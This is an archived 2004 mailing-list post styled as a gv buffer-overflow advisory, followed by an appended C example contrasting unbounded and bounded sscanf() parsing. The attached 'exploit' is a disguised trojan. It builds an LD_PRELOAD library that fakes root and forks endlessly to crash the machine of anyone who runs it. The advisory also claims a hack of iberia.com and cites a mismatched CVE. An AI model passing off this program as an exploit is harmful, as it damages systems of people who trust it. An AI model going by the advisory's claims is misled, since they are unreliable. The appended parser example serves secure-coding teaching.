Message-ID: <200408041146.i74BkCCH090487@mailserver3.hushmail.com>
From: infohacking at hush.com (Hugo Vazquez Carapez )
Subject: IFH-ADV-31339 Exploitable Buffer Overflow in gv
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
zen-parse ZP! told me that he discovered this vulnerability first...
Infohacking was misinformed... so we apologize for this mistake.
Anyways you can still enjoy my leet exploit.
On Wed, 04 Aug 2004 03:18:53 -0700 Hugo Vazquez Carapez <infohacking@...h.com>
wrote:
>Exploitable Buffer Overflow in gv
>
>
>Infohacking Security Advisory 08.04.04
>www.infohacking.com
>Aug 04, 2004
>
>
>I. BACKGROUND
>
>Infohacking team (me and myself) discovered a new and unreported local
>root vulnerability in gv.
>
>
>
>II. DESCRIPTION
>
>The gv program that is shipped on many Unix systems contains a buffer
>overflow which can be exploited by an attacker sending a malformed
>PostScript or Adobe PDF file. The attacker would be able to cause
>arbitrary code to run with the privileges of the victim on his Linux
>computer. The gv program is a PDF and PostScript viewing program for
>Unix which interfaces with the ghostscript interpreter. It is
>maintained at http://www.thep.physik.uni-mainz.de/~plass/gv/ by
>Johannes Plass. This particular security vulnerability occurs in the
>source code where an unsafe sscanf() call is used to interpret
>PostScript and PDF files.
>
>
>
>III. ANALYSIS
>
>In order to perform exploitation, an attacker would have to trick a
>user into viewing a malformed PDF or PostScript file from the command
>line. This may be somewhat easier for Unix based email programs that
>associate gv with email attachments. Since gv is not normally
>installed setuid root, an attacker would only be able to cause
>arbitrary code to run with the privileges of that user. Other
>programs that utilize derivatives of gv, such as ggv or kghostview,
>may also be vulnerable in similar ways.
>
>A proof of concept exploit for Red Hat Linux designed by Hugo is
>attached to this message. It packages the overflow and shellcode in
>the "%%PageOrder:" section of the PDF.
>
>
>/* !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE !!PRIVATE
> *
> * INFOHACKING RESEARCH - L337 h4x0r t34M
> *
> * hugo <hugo@...ohacking.com>
> */
>
>#include <stdio.h>
>#include <stdlib.h>
>#include <unistd.h>
>
>/* hellc0de is not machine code: the hex bytes spell out the C source
> *   int getuid() { return 0; }
> *   int geteuid() { return 0; }
> *   int getgid() { return 0; }
> *   int getegid() { return 0; }
> * followed by a NUL, so the trailing "/bin/sh" is never written out. */
>char hellc0de[] = "\x69\x6e\x74\x20\x67\x65\x74\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65"
>    "\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74"
>    "\x65\x75\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30"
>    "\x3b\x20\x7d\x0a\x69\x6e\x74\x20\x67\x65\x74\x67\x69\x64\x28\x29\x20"
>    "\x7b\x20\x72\x65\x74\x75\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x69\x6e\x74"
>    "\x20\x67\x65\x74\x65\x67\x69\x64\x28\x29\x20\x7b\x20\x72\x65\x74\x75"
>    "\x72\x6e\x20\x30\x3b\x20\x7d\x0a\x0/bin/sh";
>
>int main()
>{
>    FILE *fp;
>    char *offset;
>
>    /* write the source above to /tmp/own.c and build it as a shared object */
>    fp = fopen("/tmp/own.c", "w");
>    if (fp == NULL)
>        return 1;
>    fprintf(fp, "%s", hellc0de);
>    fclose(fp);
>    system("gcc -shared -o /tmp/own.so /tmp/own.c;rm -f /tmp/own.c");
>
>    /* child: after 10 seconds, fork and allocate in an endless loop,
>     * i.e. a fork bomb against whoever runs this program */
>    if (fork() == 0) {
>        sleep(10);
>        while (1) { fork(); offset = malloc(512); }
>        exit(0);
>    }
>
>    /* parent: start a shell with the library preloaded, so uid/gid
>     * queries inside it return 0; the real privileges are unchanged */
>    system("LD_PRELOAD=/tmp/own.so /bin/sh");
>    return 0;
>}
>/* -EOF- */
>
>
>IV. DETECTION
>
>
>This vulnerability affects the latest version of gv. An
>exploit has been tested on Red Hat Linux 9 and Fedora Core 1.
>
>
>
>V. WORKAROUNDS
>
>
>To avoid potential exploitation, users can select alternatives to gv
>such as Kghostview (included with the KDE desktop environment) for
>instance. Additionally, the vulnerability does not seem to be
>exploitable when a file is opened from the gv interface instead of
>the command line.
>
>
>
>VI. CVE INFORMATION
>
>
>The Common Vulnerabilities and Exposures project (cve.mitre.org) has
>assigned the name CAN-2001-0832 to this issue.
>
>
>VII. DISCLOSURE TIMELINE
>
>
>03/18/04 Hugo notified the bug to abuse@....255.255.255
>04/11/04 Initial vendor notification - no response
>04/30/04 Secondary vendor notification - no response
>05/20/04 We hack iberia.com (Hey look at me! I'm a hax0r and I want a
>job)
>08/04/04 Public Disclosure
>
>
>VIII. CREDIT
>
>Hugo Vazquez Carapez http://www.infohacking.com/dirhugo.gif
>
>
>Get pwned by script kiddies?
>Call us, we can hack you again.
>
>
>IX. LEGAL NOTICES
>
>
>Copyright (c) 2004 INFOHACKING, Inc.
>
>
>Permission is granted for the redistribution of this alert
>electronically. It may not be edited in any way without the express
>written consent of INFOHACKING. If you wish to reprint the whole or any
>part of this alert in any other medium other than electronically, please
>email info@...ohacking.com for permission.
>
>
>Disclaimer: Infohacking is pretty whitehat and lame. If you are a part
>of the blackhat community, please hack and remove us from the net.
>
>
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.4
wkYEARECAAYFAkEQzOQACgkQPMMEGI9aoafEWwCgtFnVpywRuICNcn0JvrNCQ1rZ0QIA
n2xe5aH3fb85WCuDwwOhVO+RGbVs
=4XWm
-----END PGP SIGNATURE-----
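The advisory names the bug class (an unbounded sscanf() on the "%%PageOrder:" DSC comment) but the attached program never touches gv. The following is an added example, written for this page and not gv's source or anything from the post above, of what that unsafe pattern looks like next to a width-limited parser for the same comment. PSLINELENGTH, the function names, and the sample lines are assumptions made for the example; the value set (Ascend, Descend, Special, (atend)) is the one the DSC 3.0 specification allows for this comment.

```c
/*
 * Added example (not gv's code, not part of the advisory): the unbounded
 * sscanf() pattern beside a bounded parser for %%PageOrder:.
 * PSLINELENGTH and the names below are assumptions for this example.
 */
#include <stdio.h>
#include <string.h>

#define PSLINELENGTH 257                 /* assumed size of a DSC line buffer */
#define PAGE_ORDER_TAG "%%PageOrder:"

enum page_order { PO_NONE = 0, PO_ASCEND, PO_DESCEND, PO_SPECIAL, PO_ATEND };

/* The unsafe pattern: "%s" carries no field width, so sscanf() copies the
 * whole token into 'order' no matter how long it is.  A %%PageOrder: line
 * with more than PSLINELENGTH-1 non-space bytes overruns the caller's
 * buffer.  Only ever call this with short, trusted input. */
static int page_order_unsafe(const char *line, char order[PSLINELENGTH])
{
    size_t taglen = strlen(PAGE_ORDER_TAG);
    if (strncmp(line, PAGE_ORDER_TAG, taglen) != 0)
        return 0;
    return sscanf(line + taglen, "%s", order) == 1;
}

/* Hardened parser: the field width (buffer size minus one for the NUL)
 * bounds the copy, %n records where the token ended so an over-long token
 * is rejected instead of silently truncated, and the value is checked
 * against the forms DSC allows for this comment. */
static enum page_order parse_page_order(const char *line)
{
    char tok[PSLINELENGTH];
    int end = 0;
    size_t taglen = strlen(PAGE_ORDER_TAG);
    const char *rest;

    if (strncmp(line, PAGE_ORDER_TAG, taglen) != 0)
        return PO_NONE;
    /* the width 256 must stay equal to sizeof tok - 1 */
    if (sscanf(line + taglen, " %256s%n", tok, &end) != 1)
        return PO_NONE;
    rest = line + taglen + end;
    if (*rest != '\0' && strchr(" \t\r\n", *rest) == NULL)
        return PO_NONE;                  /* token did not fit: reject the line */
    if (strcmp(tok, "Ascend") == 0)  return PO_ASCEND;
    if (strcmp(tok, "Descend") == 0) return PO_DESCEND;
    if (strcmp(tok, "Special") == 0) return PO_SPECIAL;
    if (strcmp(tok, "(atend)") == 0) return PO_ATEND;
    return PO_NONE;
}

/* Constructed sample input: a %%PageOrder: line whose value is 'pad'
 * bytes of 'A', the shape of line the advisory says the overflow rides in.
 * Fed only to the bounded parser; the unsafe one would overrun. */
static enum page_order parse_long_page_order(size_t pad)
{
    char line[4096];
    size_t taglen = strlen(PAGE_ORDER_TAG);
    if (pad > sizeof line - taglen - 3)
        pad = sizeof line - taglen - 3;
    memcpy(line, PAGE_ORDER_TAG, taglen);
    line[taglen] = ' ';
    memset(line + taglen + 1, 'A', pad);
    line[taglen + 1 + pad] = '\n';
    line[taglen + 2 + pad] = '\0';
    return parse_page_order(line);
}

/* The unsafe variant is fine on a short, well-formed line; returns 1 if
 * it parsed "Ascend" from the constructed sample. */
static int unsafe_short_line_ok(void)
{
    char order[PSLINELENGTH];
    return page_order_unsafe("%%PageOrder: Ascend\n", order) == 1
        && strcmp(order, "Ascend") == 0;
}

int main(void)
{
    printf("Ascend -> %d, 600 x 'A' -> %d\n",
           parse_page_order("%%PageOrder: Ascend\n"),
           parse_long_page_order(600));
    return 0;
}
```

The %n trick matters because a bare width limit turns the overflow into a silent truncation: the first 256 bytes of an attacker's value would be accepted as if they were the whole comment. Rejecting the line when the byte after the token is not whitespace keeps the parser honest about what it actually read.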